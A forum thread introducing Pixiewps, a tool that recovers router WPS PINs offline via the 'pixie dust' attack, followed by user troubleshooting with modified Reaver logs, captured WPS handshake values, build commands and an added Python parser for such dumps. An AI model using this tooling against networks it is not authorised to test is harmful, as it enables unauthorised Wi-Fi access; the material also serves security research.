
Thread: Pixiewps: wps pixie dust attack tool

  1. #1
    Member
    Join Date
    Mar 2015
    Posts
    47

    Pixiewps: wps pixie dust attack tool

    Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only.

    As opposed to the traditional online bruteforce attack, implemented in tools like Reaver or Bully which aim to recover the pin in a few hours, this method can get the pin in only a matter of milliseconds to minutes, depending on the target, if vulnerable.



    Brief description: Offline WPS bruteforce utility
    Repository: GitHub
    License: GNU GPLv3+
    Latest release: v1.2.2

    To work properly it requires a modified version of Reaver or Bully (neither version is maintained by me):
    Modded Reaver by t6_x and datahead: GitHub
    Modded Bully by aanarchyy: GitHub (still in development/testing)

    A non-exhaustive list of vulnerable devices (not maintained by me): here

    Thread where it all started: WPS Pixie Dust Attack (Offline WPS Attack)

    References:
    1. Video presentation
    2. Slide presentation
    Last edited by wiire; 2016-01-05 at 02:35 PM.

  2. #2
    Member
    Join Date
    Mar 2013
    Posts
    40
    Only one question: does this work with Broadcom chipsets too, or does it still only work with Ralink chipsets?

  3. #3
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Ralink and some Broadcom, not all.

  4. #4
    Member
    Join Date
    Mar 2013
    Posts
    40
    Problem: modified Reaver not showing the public key (PKE).

    Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
    [+] Received M1 message
    > AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40:27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
    [+] Sending M2 message
    > E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03:0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
    > E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c:00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    [+] Trying pin 01235678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
    [+] Received M1 message
    > AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e:5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
    [+] Sending M2 message
    > E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a:c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
    > E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75:e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3

  5. #5
    Member
    Join Date
    Oct 2014
    Posts
    44
    @ FurqanHanif
    You can get it out of the M1, M2 messages in Wireshark.
    There's also a tshark.sh script that can grab it for you. I forgot where I got it; I think it was part of the wpsoffline tool download.
    But make sure it's all part of one conversation (pin attempt). I just make Reaver test one pin at a time and capture.

  6. #6
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Did you install the new Reaver? Check out the YouTube video. You don't need Wireshark at all.

  7. #7
    Member
    Join Date
    Mar 2013
    Posts
    40
    @soxrok2212 I already mentioned that it's the modified Reaver, and I also downloaded it from the YouTube link. I tried this on five routers but it isn't giving me the same output for all (no PKE)...
    @wn722 Which one is the PKE exactly from this?
    M1 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M2 wps.authenticator : 72da6b2102198192
    M3 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M3 wps.authenticator : 80c4d98ffd706201
    M3 wps.e_hash1 : 6e2cc52a5a22c84e19f701dc8153eb805fc0b247e06178ec3b01b7b8202ab69a
    M3 wps.e_hash2 : 51f0f1b6c9b828345094b535a3c1e120bad0c94f03bc5790b9de5ae40037224d
    M4 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M4 wps.authenticator : 8824706540ab0f4d
    M4 wps.encrypted_settings : 20bfe3939b2872273204fc93dd52d4ec25b68a23e596630712b3404cdb1eb125fb3f4e96a8db05a754d5eeb98940728ea243e8925b0d968fac70fc5bf71b8a36
    M4 wps.r_hash1 : b1eea2314f81f2e3d40afbe5af5c19b61bcb7f955d57f616306a696da347f0e5
    M4 wps.r_hash2 : eaf1b41b28edb43b6feeafdad792500a34482ec1b2b6ad8e974288230648e38c
    Last edited by FurqanHanif; 2015-04-03 at 01:42 PM.
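    As an added example (not from the thread, the tshark.sh script or the pixiewps project): a small Python checker for a field dump in the "Mx wps.field : hex" format pasted above. It groups the lines by WPS message, strips the line-wrap spaces that end up inside pasted hex, and flags the mistake the earlier reply warns about, lines from more than one pin attempt (the nonces change between messages) mixed into one dump. The dump and every hex value in it are constructed; the field names are the Wireshark wps.* names as they appear in the thread.

```python
import re
from collections import defaultdict

# Constructed dump in the thread's "Mx wps.field : hex" format. All values are
# made up; the M4 line carries a different enrollee nonce (a second pin
# attempt) and the M3 hashes contain a line-wrap space, as in pasted output.
SAMPLE_DUMP = """\
M1 wps.enrollee_nonce : 00112233445566778899aabbccddeeff
M2 wps.enrollee_nonce : 00112233445566778899aabbccddeeff
M2 wps.registrar_nonce : ffeeddccbbaa99887766554433221100
M2 wps.authenticator : 0102030405060708
M3 wps.registrar_nonce : ffeeddccbbaa99887766554433221100
M3 wps.e_hash1 : 11111111111111111111111111111111111111111111111111 22222222222222
M3 wps.e_hash2 : 33333333333333333333333333333333333333333333333333 44444444444444
M4 wps.enrollee_nonce : deadbeefdeadbeefdeadbeefdeadbeef
"""

LINE_RE = re.compile(r"^(M[1-8])\s+wps\.(\w+)\s*:\s*([0-9a-fA-F][0-9a-fA-F\s]*)$")

# Byte sizes from the WPS spec, expressed as hex-digit counts.
EXPECTED_HEX_LEN = {"enrollee_nonce": 32, "registrar_nonce": 32, "authenticator": 16,
                    "e_hash1": 64, "e_hash2": 64, "r_hash1": 64, "r_hash2": 64}


def parse_dump(text):
    """Map each WPS message (M1..M8) to its {field: lowercase hex} dict.
    Whitespace inside a hex value (line-wrap residue) is removed."""
    msgs = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore anything that is not a 'Mx wps.field : hex' line
        msg, field, value = m.groups()
        msgs[msg][field] = re.sub(r"\s+", "", value).lower()
    return dict(msgs)


def conversation_problems(msgs):
    """Return human-readable problems: a nonce that changes between messages
    means lines from several pin attempts were mixed into one dump, and a
    hex value of the wrong length means a truncated or garbled copy-paste."""
    problems = []
    for nonce in ("enrollee_nonce", "registrar_nonce"):
        values = {m: f[nonce] for m, f in sorted(msgs.items()) if nonce in f}
        if len(set(values.values())) > 1:
            problems.append(f"{nonce} differs across {', '.join(values)}: mixed pin attempts")
    for msg, fields in sorted(msgs.items()):
        for field, hexval in fields.items():
            want = EXPECTED_HEX_LEN.get(field)
            if want and len(hexval) != want:
                problems.append(f"{msg} {field}: {len(hexval)} hex digits, expected {want}")
    return problems


if __name__ == "__main__":
    for p in conversation_problems(parse_dump(SAMPLE_DUMP)):
        print(p)
```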

  8. #8
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    516
    Did you move reaver to bin after you compiled?

  9. #9
    Senior Member
    Join Date
    Sep 2013
    Posts
    258
    Before trying the tool I really want to say to you: "Thank you so much wiire!"
    For all your great work and above all your explanations all the way long (and for releasing GPLv3 code)

    - to work on a modified version of Reaver/Bully
    We can see that it comes from the heart and that it must have been a "pain in th-censored-ss" at some points.

    Thank you so much wiire!

  10. #10
    Member
    Join Date
    Mar 2013
    Posts
    40
    Quote Originally Posted by soxrok2212:
    > Did you move reaver to bin after you compiled?
    ./configure
    make
    make install


    I think it overwrites the existing Reaver (because the existing Reaver doesn't show the enrollee/E-Hash stuff, but installing the modified Reaver shows the enrollee/E-Hash stuff and still not the PKE). :/ So I think there is no need to copy Reaver to bin.
